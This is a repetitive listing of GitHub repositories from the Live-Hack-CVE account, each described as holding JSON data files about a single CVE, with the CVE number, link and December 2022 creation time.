**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2231 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2231](https://github.com/Live-Hack-CVE/CVE-2020-2231) create time: 2022-12-24T03:20:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12666 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12666](https://github.com/Live-Hack-CVE/CVE-2020-12666) create time: 2022-12-24T03:20:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1753 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1753](https://github.com/Live-Hack-CVE/CVE-2020-1753) create time: 2022-12-24T03:20:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2604](https://github.com/Live-Hack-CVE/CVE-2020-2604) create time: 2022-12-24T03:19:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34589 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34589](https://github.com/Live-Hack-CVE/CVE-2021-34589) create time: 2022-12-24T04:05:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45476 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45476](https://github.com/Live-Hack-CVE/CVE-2021-45476) create time: 2022-12-24T04:05:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45475 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45475](https://github.com/Live-Hack-CVE/CVE-2021-45475) create time: 2022-12-24T04:04:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21897](https://github.com/Live-Hack-CVE/CVE-2021-21897) create time: 2022-12-24T04:04:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45707 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45707](https://github.com/Live-Hack-CVE/CVE-2021-45707) create time: 2022-12-24T04:04:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44648 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44648](https://github.com/Live-Hack-CVE/CVE-2021-44648) create time: 2022-12-24T04:03:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35387 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35387](https://github.com/Live-Hack-CVE/CVE-2021-35387) create time: 2022-12-24T04:02:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37781 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37781](https://github.com/Live-Hack-CVE/CVE-2021-37781) create time: 2022-12-24T04:02:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37782 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37782](https://github.com/Live-Hack-CVE/CVE-2021-37782) create time: 2022-12-24T04:02:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35388 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35388](https://github.com/Live-Hack-CVE/CVE-2021-35388) create time: 2022-12-24T04:02:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38737 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38737](https://github.com/Live-Hack-CVE/CVE-2021-38737) create time: 2022-12-24T04:01:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38736 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38736](https://github.com/Live-Hack-CVE/CVE-2021-38736) create time: 2022-12-24T04:01:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38734 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38734](https://github.com/Live-Hack-CVE/CVE-2021-38734) create time: 2022-12-24T04:01:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36858 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36858](https://github.com/Live-Hack-CVE/CVE-2021-36858) create time: 2022-12-24T04:00:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36863 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36863](https://github.com/Live-Hack-CVE/CVE-2021-36863) create time: 2022-12-24T04:00:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38728 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38728](https://github.com/Live-Hack-CVE/CVE-2021-38728) create time: 2022-12-24T04:00:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38217 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38217](https://github.com/Live-Hack-CVE/CVE-2021-38217) create time: 2022-12-24T04:00:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38730 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38730](https://github.com/Live-Hack-CVE/CVE-2021-38730) create time: 2022-12-24T04:00:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38729 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38729](https://github.com/Live-Hack-CVE/CVE-2021-38729) create time: 2022-12-24T04:00:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38732 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38732](https://github.com/Live-Hack-CVE/CVE-2021-38732) create time: 2022-12-24T04:00:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38731 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38731](https://github.com/Live-Hack-CVE/CVE-2021-38731) create time: 2022-12-24T04:00:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38733 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38733](https://github.com/Live-Hack-CVE/CVE-2021-38733) create time: 2022-12-24T04:00:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33026 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33026](https://github.com/Live-Hack-CVE/CVE-2021-33026) create time: 2022-12-24T03:59:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22924 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22924](https://github.com/Live-Hack-CVE/CVE-2021-22924) create time: 2022-12-24T03:59:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28710 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28710](https://github.com/Live-Hack-CVE/CVE-2021-28710) create time: 2022-12-24T03:58:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3845 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3845](https://github.com/Live-Hack-CVE/CVE-2021-3845) create time: 2022-12-24T03:57:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43361 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43361](https://github.com/Live-Hack-CVE/CVE-2021-43361) create time: 2022-12-24T03:57:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29768 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29768](https://github.com/Live-Hack-CVE/CVE-2021-29768) create time: 2022-12-24T03:56:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39920 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39920](https://github.com/Live-Hack-CVE/CVE-2021-39920) create time: 2022-12-24T03:55:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39928](https://github.com/Live-Hack-CVE/CVE-2021-39928) create time: 2022-12-24T03:55:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3664 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3664](https://github.com/Live-Hack-CVE/CVE-2022-3664) create time: 2022-12-24T04:05:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3663 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3663](https://github.com/Live-Hack-CVE/CVE-2022-3663) create time: 2022-12-24T04:05:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3662 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3662](https://github.com/Live-Hack-CVE/CVE-2022-3662) create time: 2022-12-24T04:05:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3667 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3667](https://github.com/Live-Hack-CVE/CVE-2022-3667) create time: 2022-12-24T04:05:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38064 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38064](https://github.com/Live-Hack-CVE/CVE-2022-38064) create time: 2022-12-24T04:05:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36423 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36423](https://github.com/Live-Hack-CVE/CVE-2022-36423) create time: 2022-12-24T04:05:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3704 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3704](https://github.com/Live-Hack-CVE/CVE-2022-3704) create time: 2022-12-24T04:05:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43749 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43749](https://github.com/Live-Hack-CVE/CVE-2022-43749) create time: 2022-12-24T04:05:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43748 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43748](https://github.com/Live-Hack-CVE/CVE-2022-43748) create time: 2022-12-24T04:05:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20959 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20959](https://github.com/Live-Hack-CVE/CVE-2022-20959) create time: 2022-12-24T04:05:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39944 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39944](https://github.com/Live-Hack-CVE/CVE-2022-39944) create time: 2022-12-24T04:04:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42468 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42468](https://github.com/Live-Hack-CVE/CVE-2022-42468) create time: 2022-12-24T04:04:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40238 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40238](https://github.com/Live-Hack-CVE/CVE-2022-40238) create time: 2022-12-24T04:04:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43766 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43766](https://github.com/Live-Hack-CVE/CVE-2022-43766) create time: 2022-12-24T04:04:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3672 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3672](https://github.com/Live-Hack-CVE/CVE-2022-3672) create time: 2022-12-24T04:04:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3674 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3674](https://github.com/Live-Hack-CVE/CVE-2022-3674) create time: 2022-12-24T04:04:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3673 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3673](https://github.com/Live-Hack-CVE/CVE-2022-3673) create time: 2022-12-24T04:04:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3666 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3666](https://github.com/Live-Hack-CVE/CVE-2022-3666) create time: 2022-12-24T04:04:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43776 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43776](https://github.com/Live-Hack-CVE/CVE-2022-43776) create time: 2022-12-24T04:04:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37202 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37202](https://github.com/Live-Hack-CVE/CVE-2022-37202) create time: 2022-12-24T04:04:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2422 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2422](https://github.com/Live-Hack-CVE/CVE-2022-2422) create time: 2022-12-24T04:04:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29823 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29823](https://github.com/Live-Hack-CVE/CVE-2022-29823) create time: 2022-12-24T04:04:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29822 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29822](https://github.com/Live-Hack-CVE/CVE-2022-29822) create time: 2022-12-24T04:03:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31256 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31256](https://github.com/Live-Hack-CVE/CVE-2022-31256) create time: 2022-12-24T04:03:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41711 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41711](https://github.com/Live-Hack-CVE/CVE-2022-41711) create time: 2022-12-24T04:03:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0155 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0155](https://github.com/Live-Hack-CVE/CVE-2022-0155) create time: 2022-12-24T04:03:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24302 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24302](https://github.com/Live-Hack-CVE/CVE-2022-24302) create time: 2022-12-24T04:03:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0725 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0725](https://github.com/Live-Hack-CVE/CVE-2022-0725) create time: 2022-12-24T04:03:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30634 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30634](https://github.com/Live-Hack-CVE/CVE-2022-30634) create time: 2022-12-24T04:03:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3474 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3474](https://github.com/Live-Hack-CVE/CVE-2022-3474) create time: 2022-12-24T04:03:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-3789 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-3789](https://github.com/Live-Hack-CVE/CVE-2008-3789) create time: 2022-12-24T02:40:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-2948 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-2948](https://github.com/Live-Hack-CVE/CVE-2009-2948) create time: 2022-12-24T02:40:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-2694 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-2694](https://github.com/Live-Hack-CVE/CVE-2011-2694) create time: 2022-12-24T02:40:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-7345 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-7345](https://github.com/Live-Hack-CVE/CVE-2013-7345) create time: 2022-12-24T02:40:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-6712 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-6712](https://github.com/Live-Hack-CVE/CVE-2013-6712) create time: 2022-12-24T02:40:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0238 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0238](https://github.com/Live-Hack-CVE/CVE-2014-0238) create time: 2022-12-24T02:40:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1943 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1943](https://github.com/Live-Hack-CVE/CVE-2014-1943) create time: 2022-12-24T02:40:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-9261 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-9261](https://github.com/Live-Hack-CVE/CVE-2015-9261) create time: 2022-12-24T03:20:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-13326 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-13326](https://github.com/Live-Hack-CVE/CVE-2018-13326) create time: 2022-12-24T02:36:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-13144 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-13144](https://github.com/Live-Hack-CVE/CVE-2018-13144) create time: 2022-12-24T02:36:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-13113 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-13113](https://github.com/Live-Hack-CVE/CVE-2018-13113) create time: 2022-12-24T02:35:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-13327 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-13327](https://github.com/Live-Hack-CVE/CVE-2018-13327) create time: 2022-12-24T02:35:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2897](https://github.com/Live-Hack-CVE/CVE-2019-2897) create time: 2022-12-24T03:20:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20330 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20330](https://github.com/Live-Hack-CVE/CVE-2019-20330) create time: 2022-12-24T03:19:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18641](https://github.com/Live-Hack-CVE/CVE-2019-18641) create time: 2022-12-24T03:19:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19935 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19935](https://github.com/Live-Hack-CVE/CVE-2019-19935) create time: 2022-12-24T03:19:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19953 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19953](https://github.com/Live-Hack-CVE/CVE-2019-19953) create time: 2022-12-24T02:41:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19949 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19949](https://github.com/Live-Hack-CVE/CVE-2019-19949) create time: 2022-12-24T02:41:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19948 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19948](https://github.com/Live-Hack-CVE/CVE-2019-19948) create time: 2022-12-24T02:41:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19951 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19951](https://github.com/Live-Hack-CVE/CVE-2019-19951) create time: 2022-12-24T02:41:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19950 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19950](https://github.com/Live-Hack-CVE/CVE-2019-19950) create time: 2022-12-24T02:41:00Z

